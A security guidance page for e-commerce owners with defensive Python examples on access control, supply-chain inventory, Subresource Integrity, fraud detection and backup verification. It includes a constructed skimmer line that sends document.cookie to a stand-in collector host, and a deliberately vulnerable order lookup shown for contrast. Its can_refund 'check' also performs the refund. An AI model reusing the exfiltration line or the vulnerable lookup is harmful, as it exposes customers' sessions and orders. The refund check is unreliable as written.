Securing your online store and protecting your customers are important and ongoing tasks. Take a look at some steps to consider when setting up and running an online business.
1. Understand your online setup and shared responsibilities
E-commerce can be delivered in different ways (hosted platforms, managed hosting, on-premise, or custom cloud builds). Security responsibilities vary depending on what you outsource, but you remain responsible for managing your business and customers’ data, and ensuring risks are controlled.
What to do:
- Map out your service: website/storefront, admin portal, customer accounts, hosting, third party integrations, and payment journey.
- Document “who patches what” (your team, developer, hosting provider, platform vendor) and keep this up to date.
- Ensure contracts/support agreements include responsibilities for updates, incident handling, and communications.
2. Basic cyber hygiene
Basic cyber hygiene helps eliminate the common avenues attackers rely on, such as exploiting known vulnerabilities, weak authentication, and malware.
What to do:
- Keep devices, operating systems, apps, and website components up to date and remove anything you no longer use.
- Use strong, unique passwords; consider three random words or a password manager and avoid re-use across accounts.
- Use MFA on accounts wherever available, prioritising admin, hosting, email and payment accounts.
- Use appropriate endpoint protections (e.g. anti-malware) and network protections (e.g. firewalls) where they apply to your environment.
3. Identity and access management
Identity and access management is fundamental. The “front door” of your online service or store is available to everyone, so access must be controlled and proportionate to risk.
What to do:
- Separate admin accounts from day-to-day user accounts, and avoid shared admin logins wherever possible.
- Apply the principle of least privilege: grant only the access needed to perform a role, and nothing more.
- Review access regularly and after role changes.
- Remove access promptly when staff leave, including contractors and third-party accounts.
4. Secure design and development
Security should be considered from the outset and built in by default across the whole life of the service: design, implementation, maintenance, and eventual decommissioning.
Before using a platform or contracting a developer:
- Research and ask questions – it is important to be confident as to how security is built into the development lifecycle and how fixes are handled.
- Know the “ins and outs” of systems and services being used. You don’t have to be technical, but visibility and a basic understanding of what components are being used can help to identify problems and threats.
- Ensure responsibilities for patching, vulnerability management, and incident response are explicit, and make sure you understand exactly what each party is responsible for.
5. Common e-commerce website risks
The OWASP Top 10 lists the most critical web application security risks and is a useful reference for store owners and developers. Even if you outsource development, understanding these risks helps you ask better questions and prioritise the right controls.
High-impact risks:
- Broken access control: users can access data/actions they shouldn’t.
- Security misconfiguration: unsafe defaults, exposed services, weak settings.
- Software supply chain failures: compromised or risky third-party components, plugins, dependencies.
- Authentication failures: weak login controls, poor session handling.
- Security logging and alerting failures: without them you cannot detect an attack or respond to it quickly.
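The first of these risks, broken access control, is easiest to recognise in code. The following is an added illustration, not code from the original page: a store's "view order" lookup in its common vulnerable form beside a hardened version. The in-memory ORDERS table, the Session object and the refund action are constructed stand-ins for a real store's database, login session and admin function.

```python
"""Broken access control: an insecure direct object reference beside its fix.

Added illustration for this page, not code from the original. The orders
table and session object are constructed in-memory stand-ins for a real
store's database and login session.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    """What the application knows about the caller after login."""
    user_id: int
    is_admin: bool = False


class Forbidden(Exception):
    pass


# Constructed sample data: order id -> owner, total in pence, status
ORDERS = {
    1001: {"owner": 7, "total_pence": 4999, "status": "paid"},
    1002: {"owner": 8, "total_pence": 12000, "status": "paid"},
}


def get_order_vulnerable(session: Session, order_id: int) -> dict:
    """The common bug: being logged in is treated as being authorised.
    Any customer can read any order by changing the id in the URL."""
    return ORDERS[order_id]


def get_order(session: Session, order_id: int) -> dict:
    """Hardened: authorise on the relationship between caller and object."""
    order = ORDERS.get(order_id)
    if order is None or (order["owner"] != session.user_id and not session.is_admin):
        # Deny by default, and use one error for "missing" and "not yours"
        # so the order id space cannot be enumerated.
        raise Forbidden("order not found")
    return order


def refund_order(session: Session, order_id: int) -> dict:
    """A privileged action: ownership is not enough, the role is checked too."""
    if not session.is_admin:
        raise Forbidden("admin role required")
    order = get_order(session, order_id)
    order["status"] = "refunded"
    return order


def can_read(session: Session, order_id: int) -> bool:
    """Report the authorisation decision of get_order as a bool."""
    try:
        get_order(session, order_id)
        return True
    except Forbidden:
        return False


def can_refund(session: Session, order_id: int) -> bool:
    """Report the authorisation decision of refund_order as a bool."""
    try:
        refund_order(session, order_id)
        return True
    except Forbidden:
        return False
```

The point to take away when questioning a developer or platform: every read and every action should be checked against who the caller is and what they own or are allowed to do, and a failed check should fail closed with the same response as a missing record.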
6. Supply chain
Most stores rely on extensions/plugins, themes, analytics tags, marketing pixels, chat widgets, and other third-party components, and each one increases the attack surface and the risk.
What to do:
- Install only what you need and remove unused components.
- Use reputable sources/vendors and keep components updated.
- Keep a simple components inventory: component name, source/vendor, purpose, owner, update cadence, and last reviewed date.
- Restrict who can install/modify components and require MFA for admin actions.
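A simple inventory is only useful if someone acts on it. As an added example (not code from the original page), the script below reads an inventory with the fields listed above and flags components that have no owner or whose review is overdue relative to their update cadence. The CSV rows, vendor domains and cadence values are constructed samples.

```python
"""Flag third-party components whose review is overdue or that have no owner.

Added illustration for this page, not code from the original. The CSV
columns follow the inventory fields suggested above; the rows, vendors and
names are constructed samples.
"""
import csv
import io
from datetime import date, timedelta

# Constructed sample inventory (cadence in days, dates in ISO format)
INVENTORY_CSV = """\
name,source,purpose,owner,update_cadence_days,last_reviewed
Payments plugin,psp.example,Checkout payments,Jane (ops),30,2026-01-20
Analytics tag,tags.example,Web analytics,,90,2025-09-01
Chat widget,chat.example,Customer support,Sam (marketing),60,2025-10-15
Storefront theme,theme.example,Storefront theme,Jane (ops),30,2026-01-28
"""


def review_inventory(csv_text: str, as_of: date) -> list:
    """Return sorted (component name, issue) pairs for anything needing attention."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row["name"].strip()
        if not row["owner"].strip():
            # An unowned component is one nobody will patch or remove
            findings.append((name, "no owner"))
        try:
            cadence = timedelta(days=int(row["update_cadence_days"]))
            last = date.fromisoformat(row["last_reviewed"])
        except ValueError:
            findings.append((name, "cadence or last_reviewed not set"))
            continue
        overdue = as_of - (last + cadence)
        if overdue.days > 0:
            findings.append((name, f"review overdue by {overdue.days} days"))
    return sorted(findings)
```

Run it from a scheduled job (or before each release) with today's date and treat any finding as a task for the named owner; a component that stays overdue for several cycles is a candidate for removal rather than another reminder.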
7. Choose robust and reputable providers
Your providers (platform, hosting, developers, managed services, and payment providers) are part of your overall security. Seek assurance that security is maintained throughout the life of your e-commerce solution, not just at launch.
Questions to ask suppliers:
- How often do you perform security assessment/testing and what evidence can you share?
- What is your patching process and timeframe for critical vulnerabilities?
- How do you manage third-party dependencies and supply chain risks?
- What logging/monitoring is available to customers and how are incidents communicated?
8. Website, transport security, and checkout integrity
TLS (HTTPS) protects data in transit and is essential for pages handling sensitive information (logins, forms, checkout).
What to do:
- Use HTTPS across your site, not just checkout, and renew certificates/services before they expire.
- Treat payment and checkout pages as high risk, and implement change control for anything that can alter checkout behaviour (templates, scripts, tags, plugins).
- If you rely on third-party scripts, ensure they are authorised and monitored for tampering. E-commerce attacks often target scripts running in the customer's browser, for example digital skimming that copies card details out of the checkout form.
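One standard way to pin a third-party script and detect tampering is Subresource Integrity (SRI): the browser refuses to run a script whose hash does not match the integrity attribute on its tag. The following is an added example, not code from the original page: it generates the integrity value for an approved script, emits the tag, and compares the script's current content against the recorded hash the way a scheduled monitoring job would. The script URL and contents are constructed samples; the job that fetches the live file is assumed, not shown.

```python
"""Pin and check third-party browser scripts with Subresource Integrity (SRI).

Added illustration for this page, not code from the original. SRI is the
browser mechanism this relies on; the script URLs and contents below are
constructed samples, and the caller is assumed to fetch live scripts.
"""
import base64
import hashlib
import hmac

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return the value to put in a <script integrity="..."> attribute."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError("SRI allows sha256, sha384 or sha512 only")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """True if the content matches any token in a space-separated integrity value.

    Browsers only consider tokens using the strongest listed algorithm; this
    checker accepts a match on any known token, which is enough for monitoring.
    """
    for token in integrity.split():
        algorithm, _, _ = token.partition("-")
        if algorithm not in SRI_ALGORITHMS:
            continue  # unknown algorithms are ignored, as browsers do
        if hmac.compare_digest(sri_hash(content, algorithm), token):
            return True
    return False


def script_tag(src: str, content: bytes) -> str:
    """Emit the tag for a template. crossorigin is required for SRI on a
    cross-origin script; without it the browser cannot check the hash."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def check_scripts(pinned: dict, fetched: dict) -> list:
    """Compare each pinned script's live content with its recorded hash.

    pinned:  url -> integrity value recorded when the script was approved
    fetched: url -> bytes fetched now (constructed here; in practice the
             monitoring job downloads each script from the vendor)
    Returns the URLs that have changed or could not be fetched.
    """
    changed = []
    for url, integrity in pinned.items():
        content = fetched.get(url)
        if content is None or not verify_sri(content, integrity):
            changed.append(url)
    return sorted(changed)


# Constructed sample: the script as approved at review time ...
APPROVED = {"https://cdn.example/widget.js": b"window.chatWidget = function () {};\n"}
# ... and the same file with a line the vendor never shipped (a skimmer-style addition)
TAMPERED = (b"window.chatWidget = function () {};\n"
            b"fetch('https://collector.example/?c=' + document.cookie);\n")
```

SRI only works for scripts whose content is fixed and versioned. A tag manager or widget that legitimately changes its code cannot be pinned this way; for those, self-host a reviewed copy where the vendor permits it, restrict what can load with a Content Security Policy, and keep the content comparison above as your alert that something changed.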
9. Payment gateway and card data handling
Use reputable payment service providers (PSPs) and design payments so your systems handle as little data as possible. This reduces risk and helps simplify compliance responsibilities.
What to do:
- Consider a hosted payment page/redirect or compliant embedded payment solution so payment processing is handled by the provider.
- Avoid storing card data unless you truly need to. If you must support recurring payments, discuss options with your PSP to reduce sensitive data in your environment.
- Remember that even when payments are outsourced, your website can still be attacked in ways that compromise your customers' financial and personal data (for example by altering the checkout page itself), so your own web security remains essential.
10. Fraud protection and account abuse
Fraud prevention is an important part of running an online business. Reputable platform providers and payment gateways can provide fraud prevention tools and advice.
What to do:
- Use the fraud controls provided by your payment gateway (velocity checks, risk scoring, address/identity checks) and ensure they are enabled and configured correctly.
- Monitor for suspicious behaviour (unusual traffic spikes, repeated failed logins, abnormal purchase patterns).
- Robust customer account security is a good fraud prevention measure; strong authentication methods and effective monitoring will reduce the chances of account takeover and refund/transaction abuse.
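Two of the patterns listed above, repeated failed logins and bursts of orders, can be spotted with simple sliding-window counts before a gateway's risk scoring ever sees the transaction. The following is an added example, not code from the original page and not any payment gateway's fraud engine: it runs over constructed log lines (timestamp, event, key=value fields, in time order) and raises one alert per source address when the count inside the window exceeds a threshold. The log format, the thresholds and the ten-minute window are assumptions to adapt to your own logs.

```python
"""Sliding-window checks for credential stuffing and card-testing velocity.

Added illustration for this page, not code from the original and not a
payment gateway's own fraud engine. The log lines are constructed; the
format (timestamp, event, key=value fields, in time order) and the
thresholds are assumptions to adapt to your own logs.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample: six failed logins for different users from one address
# (credential stuffing), four small orders on four cards from one address
# (card testing), and one ordinary purchase.
SAMPLE_LOG = """\
2026-02-04T10:00:01Z login_failed ip=203.0.113.5 user=alice
2026-02-04T10:00:03Z login_failed ip=203.0.113.5 user=bob
2026-02-04T10:00:05Z login_failed ip=203.0.113.5 user=carol
2026-02-04T10:00:07Z login_failed ip=203.0.113.5 user=dave
2026-02-04T10:00:09Z login_failed ip=203.0.113.5 user=erin
2026-02-04T10:00:11Z login_failed ip=203.0.113.5 user=frank
2026-02-04T10:05:00Z order ip=198.51.100.9 card=4242 amount=49.99
2026-02-04T10:05:30Z order ip=198.51.100.9 card=4243 amount=49.99
2026-02-04T10:06:00Z order ip=198.51.100.9 card=4244 amount=49.99
2026-02-04T10:06:30Z order ip=198.51.100.9 card=4245 amount=49.99
2026-02-04T11:00:00Z order ip=192.0.2.77 card=5555 amount=120.00
"""


def parse_line(line: str):
    """Split 'timestamp event k=v k=v' into (datetime, event, attrs)."""
    ts, event, *fields = line.split()
    attrs = dict(f.split("=", 1) for f in fields)
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, event, attrs


def detect(lines, window=timedelta(minutes=10), login_limit=5, order_limit=3) -> list:
    """Return alert strings; one alert per (rule, ip) the first time it trips."""
    recent = defaultdict(deque)   # (rule, ip) -> timestamps still inside the window
    cards = defaultdict(set)      # ip -> distinct card labels seen (cumulative)
    alerted = set()
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        when, event, attrs = parse_line(line)
        if event == "login_failed":
            rule, limit = "failed_logins", login_limit
        elif event == "order":
            rule, limit = "order_velocity", order_limit
            cards[attrs["ip"]].add(attrs.get("card", "?"))
        else:
            continue
        key = (rule, attrs["ip"])
        q = recent[key]
        q.append(when)
        while q and when - q[0] > window:   # drop events older than the window
            q.popleft()
        if len(q) > limit and key not in alerted:
            alerted.add(key)
            detail = f"{len(q)} events"
            if rule == "order_velocity":
                detail += f", {len(cards[attrs['ip']])} distinct cards"
            alerts.append(f"{rule}: {detail} from ip={attrs['ip']} within {window}")
    return alerts
```

Keying on source address is the simplest case; in practice you would also key failed logins on the target account (a single account hit from many addresses) and orders on card, e-mail or delivery address, and feed the alerts to whoever can block the source or hold the orders for review.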
11. Vulnerability management
Exploiting known vulnerabilities is a common starting point for attacks against online services, so vulnerability management needs an efficient process.
What to do:
- Maintain an asset inventory: domains, hosts, applications, plugins, integrations.
- Run vulnerability scanning as part of a broader programme: discovery > detection > triage > remediation > re-scan/verify fixes.
- For more in-depth guidance on vulnerability management, visit: Guidance - NCSC.GOV.UK
12. Recovery planning, backups, and incident response
Incidents happen, so plan how you will keep operating and recover quickly.
Backups:
- Keep regular, reliable backups and test restores so you know recovery works.
- Consider the 3-2-1 rule: 3 copies of data, at least 2 different media types, 1 offsite copy.
- Protect backups from ransomware by ensuring at least one copy is effectively offline, or otherwise cannot be reached or modified from the systems it protects; this applies to cloud backups as much as to physical media.
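"Test restores" means more than checking that the archive opens. As an added example (not code from the original page), the script below backs up a directory, records a checksum of every file, restores the archive into a scratch location and compares the result against that record, so a backup that is missing a file, or whose contents were silently corrupted or encrypted before the job ran, is reported rather than discovered during a real recovery. The sample store directory, file names and contents are constructed; the tar.gz archive and sha256 manifest are the assumed backup format.

```python
"""Back up a directory, then prove the backup restores correctly.

Added illustration for this page, not code from the original. The sample
store data is constructed; tar.gz plus a sha256 manifest is the assumed
backup format.
"""
import hashlib
import os
import tarfile
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest_of(root: Path) -> dict:
    """relative path -> sha256 for every file under root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def create_backup(src: Path, archive: Path) -> dict:
    """Write src to a tar.gz and return the manifest to keep beside it."""
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(src, arcname=".")
    return manifest_of(src)


def safe_extract(archive: Path, dest: Path) -> None:
    """Extract, refusing members that would land outside dest or are links
    (a malicious or corrupted archive must not write elsewhere on the host)."""
    dest_real = os.path.realpath(dest)
    with tarfile.open(archive, "r:gz") as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest_real, member.name))
            if target != dest_real and not target.startswith(dest_real + os.sep):
                raise ValueError(f"refusing to extract outside destination: {member.name}")
            if member.issym() or member.islnk():
                raise ValueError(f"refusing to extract link: {member.name}")
            tar.extract(member, dest_real)


def verify_restore(archive: Path, expected: dict) -> list:
    """Restore into a scratch directory and report every difference from the manifest."""
    problems = []
    with tempfile.TemporaryDirectory() as tmp:
        restored = Path(tmp)
        safe_extract(archive, restored)
        actual = manifest_of(restored)
        for rel, digest in expected.items():
            if rel not in actual:
                problems.append(f"{rel}: missing from restore")
            elif actual[rel] != digest:
                problems.append(f"{rel}: checksum mismatch")
        for rel in actual.keys() - expected.keys():
            problems.append(f"{rel}: unexpected file in restore")
    return sorted(problems)


def demo() -> dict:
    """Constructed end-to-end run: a good backup verifies clean, a bad one does not."""
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp)
        src = tmp / "store-data"
        (src / "config").mkdir(parents=True)
        (src / "orders.csv").write_text("order_id,total\n1001,49.99\n")      # constructed
        (src / "config" / "settings.json").write_text('{"currency": "GBP"}\n')  # constructed
        good = tmp / "backup-1.tar.gz"
        manifest = create_backup(src, good)
        clean = verify_restore(good, manifest)
        # Simulate a later backup whose content no longer matches the manifest,
        # e.g. a file encrypted by ransomware before the backup job ran
        (src / "orders.csv").write_text("ENCRYPTED\n")
        bad = tmp / "backup-2.tar.gz"
        create_backup(src, bad)
        tampered = verify_restore(bad, manifest)
    return {"clean": clean, "tampered": tampered}
```

Store the manifest somewhere the backup job itself cannot overwrite (the same place as your offline copy is a good choice), and schedule the restore check to run on the copy you would actually recover from, not only on the freshest one.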
Incident response:
- Have an incident plan that covers containment, roles, communication, and recovery steps.
- If personal data may be involved, follow a breach assessment and reporting process.
- Ensure all staff are regularly trained, and consider running incident response tabletop exercises.
- For more in-depth guidance on incident response and management, visit: https://www.ncsc.gov.uk/collection/incident-management
Data breach reporting (GDPR expectations):
- You should have procedures to detect, manage, and record breaches, even if they aren’t reportable.
- For more in-depth guidance on data protection compliance, visit: Data protection compliance - the basics, Data Protection Act 2018
Further reading:
This page was last updated 04/02/2026